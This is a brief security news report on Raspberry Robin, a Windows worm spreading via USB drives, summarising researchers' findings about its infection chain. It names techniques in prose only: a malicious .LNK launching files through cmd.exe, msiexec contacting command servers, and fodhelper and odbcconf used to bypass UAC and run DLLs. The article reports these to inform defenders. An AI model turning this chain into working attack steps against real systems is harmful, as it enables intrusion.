Analysts from Red Canary have discovered a new malware for Windows called Raspberry Robin, which has the properties of a worm and spreads via USB drives.
The researchers write that they found malware in the networks of several of their clients, among which were unnamed companies from the technology and manufacturing sectors.
Let me remind you that we also wrote that New Bumblebee Malware Downloader Became a Replacement for BazarLoader for Hackers.
It soon became clear that Raspberry Robin spreads when an infected USB drive containing a malicious .LNK file is connected to the machine. The worm then launches a new process on the system, using cmd.exe to launch a malicious file stored on the infected device.
The malware uses the Microsoft Standard Installer (msiexec.exe) to access the command and control servers, and the researchers believe that the C&C servers are hosted on compromised Qnap devices and use Tor exit nodes as additional infrastructure.
While experts aren’t yet sure exactly how the malware takes hold on infected systems, they suspect that it installs malicious DLL files on compromised machines to prevent deletion between reboots.
The Raspberry Robin runs the DLL using two other legitimate Windows utilities: fodhelper and odbcconf. The first allows to bypass User Account Control (UAC), while the second helps to execute and configure the DLL.
At the same time, the researchers admit that they have not yet been able to figure out how and where Raspberry Robin infects external devices. It is assumed that this generally happens offline. Also, another important question remains unanswered: what is the ultimate goal of Raspberry Robin operators?